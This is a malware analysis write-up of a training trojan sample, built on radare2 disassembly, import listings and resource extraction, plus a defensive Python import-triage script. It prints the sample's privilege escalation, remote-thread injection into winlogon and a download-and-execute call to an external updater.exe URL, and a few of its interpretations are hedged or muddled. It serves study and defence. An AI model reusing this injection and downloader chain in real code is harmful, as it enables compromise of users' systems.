Name: Win.Trojan.Agent-375080
Not packed. Compiled and linked with MS VC++ 6.0. Compilation timestamp, taken from the PE header:
#rabin2 -h lab1-4.exe
PE file header:
IMAGE_NT_HEADERS
Signature : 0x4550
IMAGE_FILE_HEADERS
Machine : 0x14c
NumberOfSections : 0x4
TimeDateStamp : 0x5d69a2b3
PointerToSymbolTable : 0x0
NumberOfSymbols : 0x0
SizeOfOptionalHeader : 0xe0
Characteristics : 0x10f
>>> from datetime import datetime
>>> datetime.fromtimestamp(int('0x5d69a2b3', 16))
datetime.datetime(2019, 8, 31, 0, 26, 59)
TS: 2019-8-31 0:26:59
[0x004015cf]> ii
[Imports]
1 0x00402010 NONE FUNC KERNEL32.dll_GetProcAddress
2 0x00402014 NONE FUNC KERNEL32.dll_LoadLibraryA
3 0x00402018 NONE FUNC KERNEL32.dll_WinExec
4 0x0040201c NONE FUNC KERNEL32.dll_WriteFile
5 0x00402020 NONE FUNC KERNEL32.dll_CreateFileA
6 0x00402024 NONE FUNC KERNEL32.dll_SizeofResource
7 0x00402028 NONE FUNC KERNEL32.dll_CreateRemoteThread
8 0x0040202c NONE FUNC KERNEL32.dll_FindResourceA
9 0x00402030 NONE FUNC KERNEL32.dll_GetModuleHandleA
10 0x00402034 NONE FUNC KERNEL32.dll_GetWindowsDirectoryA
11 0x00402038 NONE FUNC KERNEL32.dll_MoveFileA
12 0x0040203c NONE FUNC KERNEL32.dll_GetTempPathA
13 0x00402040 NONE FUNC KERNEL32.dll_GetCurrentProcess
14 0x00402044 NONE FUNC KERNEL32.dll_OpenProcess
15 0x00402048 NONE FUNC KERNEL32.dll_CloseHandle
16 0x0040204c NONE FUNC KERNEL32.dll_LoadResource
1 0x00402000 NONE FUNC ADVAPI32.dll_OpenProcessToken
2 0x00402004 NONE FUNC ADVAPI32.dll_LookupPrivilegeValueA
3 0x00402008 NONE FUNC ADVAPI32.dll_AdjustTokenPrivileges
1 0x00402054 NONE FUNC MSVCRT.dll__snprintf
2 0x00402058 NONE FUNC MSVCRT.dll__exit
3 0x0040205c NONE FUNC MSVCRT.dll__XcptFilter
4 0x00402060 NONE FUNC MSVCRT.dll_exit
5 0x00402064 NONE FUNC MSVCRT.dll___p___initenv
6 0x00402068 NONE FUNC MSVCRT.dll___getmainargs
7 0x0040206c NONE FUNC MSVCRT.dll__initterm
8 0x00402070 NONE FUNC MSVCRT.dll___setusermatherr
9 0x00402074 NONE FUNC MSVCRT.dll__adjust_fdiv
10 0x00402078 NONE FUNC MSVCRT.dll___p__commode
11 0x0040207c NONE FUNC MSVCRT.dll___p__fmode
12 0x00402080 NONE FUNC MSVCRT.dll___set_app_type
13 0x00402084 NONE FUNC MSVCRT.dll__except_handler3
14 0x00402088 NONE FUNC MSVCRT.dll__controlfp
15 0x0040208c NONE FUNC MSVCRT.dll__stricmp
The imports show process access and remote thread creation (OpenProcess, CreateRemoteThread), library loading, file copying and an exec-style call (WinExec).
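The import list above is enough for a first triage pass. The following added example (my own code, not from the write-up or from radare2) tags each imported API with the capability it suggests and checks for two API combinations that matter here: open-a-process plus create-remote-thread, and read-resource plus write-file plus execute. The capability table and weights are this example's own heuristic; the import names are copied from the `ii` listing.

```python
"""Tag a PE import list with the behaviour it suggests (added example)."""
from collections import defaultdict

# Constructed from the `ii` listing above: the KERNEL32 and ADVAPI32 entries
# plus the two MSVCRT calls the analysis refers to, in DLL_function form.
IMPORTS = [
    "KERNEL32.dll_GetProcAddress", "KERNEL32.dll_LoadLibraryA",
    "KERNEL32.dll_WinExec", "KERNEL32.dll_WriteFile", "KERNEL32.dll_CreateFileA",
    "KERNEL32.dll_SizeofResource", "KERNEL32.dll_CreateRemoteThread",
    "KERNEL32.dll_FindResourceA", "KERNEL32.dll_GetModuleHandleA",
    "KERNEL32.dll_GetWindowsDirectoryA", "KERNEL32.dll_MoveFileA",
    "KERNEL32.dll_GetTempPathA", "KERNEL32.dll_GetCurrentProcess",
    "KERNEL32.dll_OpenProcess", "KERNEL32.dll_CloseHandle",
    "KERNEL32.dll_LoadResource", "ADVAPI32.dll_OpenProcessToken",
    "ADVAPI32.dll_LookupPrivilegeValueA", "ADVAPI32.dll_AdjustTokenPrivileges",
    "MSVCRT.dll__snprintf", "MSVCRT.dll__stricmp",
]

# Heuristic table (this example's own): API name -> (capability, weight).
CAPABILITIES = {
    "LoadLibraryA": ("dynamic-api-resolution", 1),
    "GetProcAddress": ("dynamic-api-resolution", 1),
    "OpenProcess": ("process-injection", 2),
    "CreateRemoteThread": ("process-injection", 3),
    "OpenProcessToken": ("privilege-escalation", 1),
    "LookupPrivilegeValueA": ("privilege-escalation", 1),
    "AdjustTokenPrivileges": ("privilege-escalation", 2),
    "FindResourceA": ("embedded-payload", 1),
    "LoadResource": ("embedded-payload", 1),
    "SizeofResource": ("embedded-payload", 1),
    "CreateFileA": ("file-drop", 1),
    "WriteFile": ("file-drop", 1),
    "MoveFileA": ("file-drop", 1),
    "WinExec": ("execution", 2),
    "URLDownloadToFileA": ("download", 3),
}


def split_import(entry):
    """'KERNEL32.dll_GetProcAddress' -> ('KERNEL32.dll', 'GetProcAddress')."""
    dll, _, func = entry.partition(".dll_")
    return dll + ".dll", func


def triage(imports):
    """Return {capability: [api, ...]} for every imported API in the table."""
    found = defaultdict(list)
    for entry in imports:
        func = split_import(entry)[1]
        if func in CAPABILITIES:
            found[CAPABILITIES[func][0]].append(func)
    return dict(found)


def score(imports):
    """Sum of the weights of all recognised APIs; higher means more to look at."""
    funcs = (split_import(e)[1] for e in imports)
    return sum(CAPABILITIES[f][1] for f in funcs if f in CAPABILITIES)


def injection_chain(imports):
    """True when the binary can open another process and run a thread in it."""
    funcs = {split_import(e)[1] for e in imports}
    return {"OpenProcess", "CreateRemoteThread"} <= funcs


def drop_and_run_chain(imports):
    """True for the resource-read + file-write + execute pattern seen in this lab."""
    funcs = {split_import(e)[1] for e in imports}
    return ({"FindResourceA", "LoadResource"} <= funcs
            and {"CreateFileA", "WriteFile"} <= funcs
            and "WinExec" in funcs)


if __name__ == "__main__":
    for cap, apis in sorted(triage(IMPORTS).items()):
        print(f"{cap:24s} {', '.join(apis)}")
    print("score:", score(IMPORTS),
          "injection:", injection_chain(IMPORTS),
          "drop-and-run:", drop_and_run_chain(IMPORTS))
```

The same pass run over the imports of the carved resource (WinExec plus URLDownloadToFileA) lands on "download" and "execution", which is the downloader profile the conclusion reaches by hand.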
Total functions:
[0x004015cf]> afl
0x00401000 7 252 sub.winlogon.exe_0
0x004010fc 6 120 sub.KERNEL32.dll_GetCurrentProcess_fc
0x00401174 6 136 sub.SeDebugPrivilege_174
0x004011fc 1 340 sub.KERNEL32.dll_GetWindowsDirectoryA_1fc
0x00401350 19 589 sub.EnumProcessModules_350
0x004015a0 3 47 fcn.004015a0
0x004015cf 3 260 entry0
0x004016e0 1 6 sub.MSVCRT.dll__XcptFilter_6e0
0x004016e6 1 6 sub.MSVCRT.dll__initterm_6e6
0x004016ec 1 18 fcn.004016ec
0x00401701 1 1 fcn.00401701
0x00401716 1 6 sub.MSVCRT.dll__controlfp_716
After the CRT initialisation in entry0, it calls sub.EnumProcessModules_350 at 0x00401350.
It first loads an external DLL, psapi.dll (the Process Status API library), and then resolves EnumProcessModules with GetProcAddress():
| 0x004013aa 6878304000 push str.EnumProcessModules ; 0x403078 ; "EnumProcessModules"
| 0x004013af 688c304000 push 0x40308c ; "psapi.dll"
| 0x004013b4 ff1514204000 call dword [sym.imp.KERNEL32.dll_LoadLibraryA] ; 0x402014
| 0x004013ba 50 push eax
| 0x004013bb ff1510204000 call dword [sym.imp.KERNEL32.dll_GetProcAddress] ; 0x402010
Then it calls LoadLibrary() once more, this time resolving EnumProcesses (not sure, but it seems like it will try to replace the DLL with a patched library, probably from the resource):
0x004013dd a328314000 mov dword [0x403128], eax ; [0x403128:4]=0
| 0x004013e2 68b8304000 push str.EnumProcesses ; 0x4030b8 ; "EnumProcesses"
| 0x004013e7 68c8304000 push str.psapi.dll ; 0x4030c8 ; "psapi.dll"
| 0x004013ec ff1514204000 call dword [sym.imp.KERNEL32.dll_LoadLibraryA] ; 0x402014
| 0x004013f2 50 push eax
| 0x004013f3 ff1510204000 call dword [sym.imp.KERNEL32.dll_GetProcAddress] ; 0x402010
After some computation it calls an internal function for the library patching:
| |:||| 0x004014a3 e858fbffff call sub.winlogon.exe_0
This function calls OpenProcess() on winlogon.exe, performs some additional operations and calls strcmp().
Then it calls the next function, sub.SeDebugPrivilege_174:
| |`-> 0x004011a1 6a02 push 2 ; 2
| | 0x004011a3 6840304000 push str.sfc_os.dll ; 0x403040 ; "sfc_os.dll"
| | 0x004011a8 ff1514204000 call dword [sym.imp.KERNEL32.dll_LoadLibraryA] ; 0x402014
....
....
| | 0x004011c5 ff1544204000 call dword [sym.imp.KERNEL32.dll_OpenProcess] ; 0x402044
....
....
| || 0x004011ed ff1528204000 call dword [sym.imp.KERNEL32.dll_CreateRemoteThread] ; 0x402028
This function loads sfc_os.dll, calls OpenProcess() and then creates a remote thread.
At the end of sub.EnumProcessModules_350 it works with some files and copies a new file, \\winup.exe:
| || | 0x004014eb e884fcffff call sub.SeDebugPrivilege_174
| || | 0x004014f0 83c404 add esp, 4
| || | 0x004014f3 8985d0edffff mov dword [local_1230h], eax
| || | 0x004014f9 83bdd0edffff. cmp dword [local_1230h], 0
| ||,==< 0x00401500 0f848d000000 je 0x401593
| |||| 0x00401506 680e010000 push 0x10e ; 270
| |||| 0x0040150b 8d95dcfdffff lea edx, dword [local_224h]
| |||| 0x00401511 52 push edx
| |||| 0x00401512 ff1534204000 call dword [sym.imp.KERNEL32.dll_GetWindowsDirectoryA] ; 0x402034 ; "Z\""
| |||| 0x00401518 68d4304000 push str.system32__wupdmgr.exe ; 0x4030d4 ; "\\system32\\wupdmgr.exe"
....
| |||| 0x00401550 68f4304000 push 0x4030f4 ; "\\winup.exe"
| |||| 0x00401555 8d85f0feffff lea eax, dword [local_110h]
| |||| 0x0040155b 50 push eax
| |||| 0x0040155c 6800314000 push 0x403100 ; "%s%s"
| |||| 0x00401561 680e010000 push 0x10e ; 270
| |||| 0x00401566 8d8db8ecffff lea ecx, dword [local_1348h]
| |||| 0x0040156c 51 push ecx
| |||| 0x0040156d ff1554204000 call dword [sym.imp.MSVCRT.dll__snprintf] ; 0x402054
| |||| 0x00401573 83c414 add esp, 0x14
| |||| 0x00401576 8d95b8ecffff lea edx, dword [local_1348h]
| |||| 0x0040157c 52 push edx
| |||| 0x0040157d 8d85a8ebffff lea eax, dword [local_1458h]
| |||| 0x00401583 50 push eax
| |||| 0x00401584 ff1538204000 call dword [sym.imp.KERNEL32.dll_MoveFileA] ; 0x402038 ; "r\""
The file contains a 16 KB resource:
[0x004015cf]> iR
Resource 0
name: 101
timestamp: Thu Jan 1 01:00:00 1970
vaddr: 0x00404060
size: 16K
type: UNKNOWN
language: LANG_ENGLISH
Resource extraction tool: peres (from the pev package):
#sudo apt-get install pev
...
#peres -a Lab01-04.exe
Node Type / Level: Resource Directory / 1
Characteristics: 0
Timestamp: 0
Major Version: 0
Minor Version: 0
Named entries: 1
Id entries: 0
...
Total Data Entry: 1
Save On: resources/101.bin
Then we can do the r2 analysis on the 101.bin file.
It contains some additional functions and has Windows API functions in its imports:
#r2 resources/101.bin
>>>aaa
>>>afl
0x00401000 3 299 sub.KERNEL32.dll_GetTempPathA_0
0x0040112c 1 6 sub.urlmon.dll_URLDownloadToFileA_12c
0x00401132 3 260 entry0
0x00401242 1 6 sub.MSVCRT.dll__XcptFilter_242
0x00401248 1 6 sub.MSVCRT.dll__initterm_248
0x0040124e 1 18 fcn.0040124e
0x00401263 1 1 fcn.00401263
0x00401276 1 6 sub.MSVCRT.dll__controlfp_276
>>>ii
[Imports]
1 0x00402000 NONE FUNC KERNEL32.dll_WinExec
2 0x00402004 NONE FUNC KERNEL32.dll_GetTempPathA
3 0x00402008 NONE FUNC KERNEL32.dll_GetWindowsDirectoryA
1 0x0040204c NONE FUNC urlmon.dll_URLDownloadToFileA
1 0x00402010 NONE FUNC MSVCRT.dll__controlfp
2 0x00402014 NONE FUNC MSVCRT.dll__snprintf
3 0x00402018 NONE FUNC MSVCRT.dll__exit
4 0x0040201c NONE FUNC MSVCRT.dll__XcptFilter
5 0x00402020 NONE FUNC MSVCRT.dll_exit
6 0x00402024 NONE FUNC MSVCRT.dll___p___initenv
7 0x00402028 NONE FUNC MSVCRT.dll___getmainargs
8 0x0040202c NONE FUNC MSVCRT.dll__initterm
9 0x00402030 NONE FUNC MSVCRT.dll___setusermatherr
10 0x00402034 NONE FUNC MSVCRT.dll__adjust_fdiv
11 0x00402038 NONE FUNC MSVCRT.dll___p__commode
12 0x0040203c NONE FUNC MSVCRT.dll___p__fmode
13 0x00402040 NONE FUNC MSVCRT.dll___set_app_type
14 0x00402044 NONE FUNC MSVCRT.dll__except_handler3
The most interesting import is KERNEL32.dll_WinExec(); it is used for an additional execution step in the main program.
The function in the dropped DLL downloads and runs an additional file, updater.exe, from an external URL:
| 0x004010ec 83c414 add esp, 0x14
| 0x004010ef 6a00 push 0
| 0x004010f1 6a00 push 0
| 0x004010f3 8d8dc0fbffff lea ecx, dword [local_440h]
| 0x004010f9 51 push ecx
| 0x004010fa 6844304000 push str.http:__www.practicalmalwareanalysis.com_updater.exe ; 0x403044 ; "http://www.practicalmalwareanalysis.com/updater.exe"
| 0x004010ff 6a00 push 0
| 0x00401101 e826000000 call sub.urlmon.dll_URLDownloadToFileA_12c
Conclusion
This software creates a fake DLL on the system and registers a "thread" outside its own process. It dumps an internal DLL that downloads and runs the external file http://www.practicalmalwareanalysis.com/updater.exe.
It is a typical trojan downloader.